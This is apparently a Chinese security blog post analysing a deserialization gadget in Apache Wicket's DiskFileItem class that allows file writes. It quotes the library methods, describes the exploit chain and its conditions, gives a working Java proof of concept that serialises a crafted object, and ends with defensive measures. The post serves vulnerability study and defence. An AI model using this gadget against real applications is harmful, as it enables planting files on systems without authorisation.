Apache Wicket 反序列化文件写入漏洞分析与利用<\/h1>

漏洞概述<\/h2>
Apache Wicket Utilities 中的 `org.apache.wicket.util.upload.DiskFileItem<\/code> 类存在反序列化漏洞，攻击者可以通过构造恶意序列化数据，在目标系统上写入任意文件。该漏洞利用需要知道目标系统的有效物理路径，且写入文件名不可控。<\/p>`

漏洞分析<\/h2>
关键类与方法<\/h3>


DiskFileItem.readObject()<\/strong><\/p>
private<\/span> void<\/span> readObject<\/span>(<\/span>ObjectInputStream in)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>    in.<\/span>defaultReadObject<\/span>();<\/span>
<\/span><\/span>    OutputStream output =<\/span> this<\/span>.<\/span>getOutputStream<\/span>();<\/span>
<\/span><\/span>    if<\/span> (<\/span>this<\/span>.<\/span>cachedContent<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        output.<\/span>write<\/span>(<\/span>this<\/span>.<\/span>cachedContent<\/span>);<\/span>
<\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        FileInputStream input =<\/span> new<\/span> FileInputStream(<\/span>this<\/span>.<\/span>dfosFile<\/span>);<\/span>
<\/span><\/span>        Streams.<\/span>copy<\/span>(<\/span>input,<\/span> output);<\/span>
<\/span><\/span>        Files.<\/span>remove<\/span>(<\/span>this<\/span>.<\/span>dfosFile<\/span>);<\/span>
<\/span><\/span>        this<\/span>.<\/span>dfosFile<\/span> =<\/span> null<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    output.<\/span>close<\/span>();<\/span>
<\/span><\/span>    this<\/span>.<\/span>cachedContent<\/span> =<\/span> null<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
反序列化时会调用 output.write(this.cachedContent)<\/code><\/li>
cachedContent<\/code> 可通过反射修改<\/li>
<\/ul>
<\/li>

DiskFileItem.getOutputStream()<\/strong><\/p>
public<\/span> OutputStream getOutputStream<\/span>()<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>    if<\/span> (<\/span>this<\/span>.<\/span>dfos<\/span> ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        this<\/span>.<\/span>dfos<\/span> =<\/span> new<\/span> DeferredFileOutputStream(<\/span>this<\/span>.<\/span>sizeThreshold<\/span>,<\/span> new<\/span> DeferredFileOutputStream.<\/span>FileFactory<\/span>()<\/span> {<\/span>
<\/span><\/span>            public<\/span> File createFile<\/span>()<\/span> {<\/span>
<\/span><\/span>                return<\/span> DiskFileItem.<\/span>this<\/span>.<\/span>getTempFile<\/span>();<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        });<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> this<\/span>.<\/span>dfos<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
初始化 DeferredFileOutputStream<\/code><\/li>
通过 FileFactory<\/code> 接口创建临时文件<\/li>
<\/ul>
<\/li>

ThresholdingOutputStream.write(byte[])<\/strong><\/p>
public<\/span> void<\/span> write<\/span>(<\/span>byte<\/span>[]<\/span> b)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>    this<\/span>.<\/span>checkThreshold<\/span>(<\/span>b.<\/span>length<\/span>);<\/span>
<\/span><\/span>    this<\/span>.<\/span>getStream<\/span>().<\/span>write<\/span>(<\/span>b);<\/span>
<\/span><\/span>    this<\/span>.<\/span>written<\/span> +=<\/span> (<\/span>long<\/span>)<\/span>b.<\/span>length<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
检查阈值并写入数据<\/li>
<\/ul>
<\/li>

ThresholdingOutputStream.checkThreshold()<\/strong><\/p>
protected<\/span> void<\/span> checkThreshold<\/span>(<\/span>int<\/span> count)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>    if<\/span> (!<\/span>this<\/span>.<\/span>thresholdExceeded<\/span> &&<\/span> this<\/span>.<\/span>written<\/span> +<\/span> (<\/span>long<\/span>)<\/span>count ><\/span> (<\/span>long<\/span>)<\/span>this<\/span>.<\/span>threshold<\/span>)<\/span> {<\/span>
<\/span><\/span>        this<\/span>.<\/span>thresholdReached<\/span>();<\/span>
<\/span><\/span>        this<\/span>.<\/span>thresholdExceeded<\/span> =<\/span> true<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
触发阈值检查逻辑<\/li>
<\/ul>
<\/li>

DeferredFileOutputStream.thresholdReached()<\/strong><\/p>
protected<\/span> void<\/span> thresholdReached<\/span>()<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>    byte<\/span>[]<\/span> data =<\/span> this<\/span>.<\/span>memoryOutputStream<\/span>.<\/span>toByteArray<\/span>();<\/span>
<\/span><\/span>    if<\/span> (<\/span>this<\/span>.<\/span>outputFile<\/span> ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        this<\/span>.<\/span>outputFile<\/span> =<\/span> this<\/span>.<\/span>fileFactory<\/span>.<\/span>createFile<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    FileOutputStream fos =<\/span> new<\/span> FileOutputStream(<\/span>this<\/span>.<\/span>outputFile<\/span>);<\/span>
<\/span><\/span>    fos.<\/span>write<\/span>(<\/span>data);<\/span>
<\/span><\/span>    this<\/span>.<\/span>currentOutputStream<\/span> =<\/span> fos;<\/span>
<\/span><\/span>    this<\/span>.<\/span>memoryOutputStream<\/span> =<\/span> null<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
关键文件写入点<\/li>
使用 fileFactory.createFile()<\/code> 创建文件<\/li>
<\/ul>
<\/li>

DiskFileItem.getTempFile()<\/strong><\/p>
protected<\/span> File getTempFile<\/span>()<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>this<\/span>.<\/span>tempFile<\/span> ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        File tempDir =<\/span> this<\/span>.<\/span>repository<\/span>;<\/span>
<\/span><\/span>        if<\/span> (<\/span>tempDir ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            String systemTmp =<\/span> null<\/span>;<\/span>
<\/span><\/span>            try<\/span> {<\/span>
<\/span><\/span>                systemTmp =<\/span> System.<\/span>getProperty<\/span>(<\/span>"java.io.tmpdir"<\/span>);<\/span>
<\/span><\/span>            }<\/span> catch<\/span> (<\/span>SecurityException var4)<\/span> {<\/span>
<\/span><\/span>                throw<\/span> new<\/span> RuntimeException(<\/span>"Reading property java.io.tmpdir is not allowed..."<\/span>);<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            tempDir =<\/span> new<\/span> File(<\/span>systemTmp);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            do<\/span> {<\/span>
<\/span><\/span>                String tempFileName =<\/span> "upload_"<\/span> +<\/span> UID +<\/span> "_"<\/span> +<\/span> getUniqueId()<\/span> +<\/span> ".tmp"<\/span>;<\/span>
<\/span><\/span>                this<\/span>.<\/span>tempFile<\/span> =<\/span> new<\/span> File(<\/span>tempDir,<\/span> tempFileName);<\/span>
<\/span><\/span>            }<\/span> while<\/span>(!<\/span>this<\/span>.<\/span>tempFile<\/span>.<\/span>createNewFile<\/span>());<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> RuntimeException(<\/span>"Could not create the temp file..."<\/span>,<\/span> e);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        if<\/span> (<\/span>this<\/span>.<\/span>fileUploadCleaner<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            this<\/span>.<\/span>fileUploadCleaner<\/span>.<\/span>track<\/span>(<\/span>this<\/span>.<\/span>tempFile<\/span>,<\/span> this<\/span>);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> this<\/span>.<\/span>tempFile<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
确定文件写入位置<\/li>
文件名格式为 upload_[UID]_[uniqueId].tmp<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用链<\/h3>

攻击者构造恶意 DiskFileItem<\/code> 对象<\/li>
通过反射设置 cachedContent<\/code> 为攻击载荷<\/li>
设置 repository<\/code> 为目标路径<\/li>
序列化该对象并发送给目标<\/li>
目标反序列化时触发文件写入<\/li>
<\/ol>
漏洞利用条件<\/h2>

需要知道目标系统的一个有效物理路径<\/li>
写入的文件名不可控（格式为 upload_[UID]_[uniqueId].tmp<\/code>）<\/li>
目标应用存在反序列化入口点<\/li>
<\/ol>
POC 代码<\/h2>
import<\/span> org.apache.wicket.util.io.ByteArrayOutputStream;<\/span>
<\/span><\/span>import<\/span> org.apache.wicket.util.io.DeferredFileOutputStream;<\/span>
<\/span><\/span>import<\/span> org.apache.wicket.util.io.ThresholdingOutputStream;<\/span>
<\/span><\/span>import<\/span> org.apache.wicket.util.upload.DiskFileItem;<\/span>
<\/span><\/span>import<\/span> java.io.*;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Main<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 设置要写入的文件内容
<\/span><\/span><\/span><\/span>        byte<\/span>[]<\/span> data =<\/span> "test"<\/span>.<\/span>getBytes<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 设置目标路径
<\/span><\/span><\/span><\/span>        String repoPath =<\/span> "C:\\Users\\test\\Desktop\\a"<\/span>;<\/span>
<\/span><\/span>        File repository =<\/span> new<\/span> File(<\/span>repoPath);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 创建DiskFileItem对象
<\/span><\/span><\/span><\/span>        DiskFileItem diskFileItem =<\/span> new<\/span> DiskFileItem(<\/span>""<\/span>,<\/span> ""<\/span>,<\/span> false<\/span>,<\/span> ""<\/span>,<\/span> 0<\/span>,<\/span> repository,<\/span> null<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 创建DeferredFileOutputStream并设置
<\/span><\/span><\/span><\/span>        DeferredFileOutputStream dfos =<\/span> new<\/span> DeferredFileOutputStream(<\/span>0<\/span>,<\/span> repository);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 通过反射设置关键字段
<\/span><\/span><\/span><\/span>        Reflections.<\/span>setFieldValue<\/span>(<\/span>diskFileItem,<\/span> "dfos"<\/span>,<\/span> dfos);<\/span>
<\/span><\/span>        Reflections.<\/span>setFieldValue<\/span>(<\/span>diskFileItem,<\/span> "cachedContent"<\/span>,<\/span> data);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 序列化对象
<\/span><\/span><\/span><\/span>        ObjectOutputStream objectOutputStream =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"unser.bin"<\/span>));<\/span>
<\/span><\/span>        objectOutputStream.<\/span>writeObject<\/span>(<\/span>diskFileItem);<\/span>
<\/span><\/span>        objectOutputStream.<\/span>close<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 模拟反序列化触发
<\/span><\/span><\/span><\/span>        new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"unser.bin"<\/span>)).<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>防御措施<\/h2>

输入验证<\/strong>：对反序列化数据进行严格验证<\/li>
使用白名单<\/strong>：限制可反序列化的类<\/li>
更新组件<\/strong>：升级到修复版本<\/li>
权限控制<\/strong>：限制应用的文件系统访问权限<\/li>
安全配置<\/strong>：使用Java安全管理器限制敏感操作<\/li>
<\/ol>
总结<\/h2>
该漏洞利用Apache Wicket Utilities中DiskFileItem<\/code>类的反序列化机制，通过反射修改关键字段实现任意文件写入。虽然利用需要知道目标系统的有效路径且文件名不可控，但在特定环境下仍可能造成严重危害。开发者应关注反序列化安全问题，及时更新组件并实施适当的安全措施。<\/p>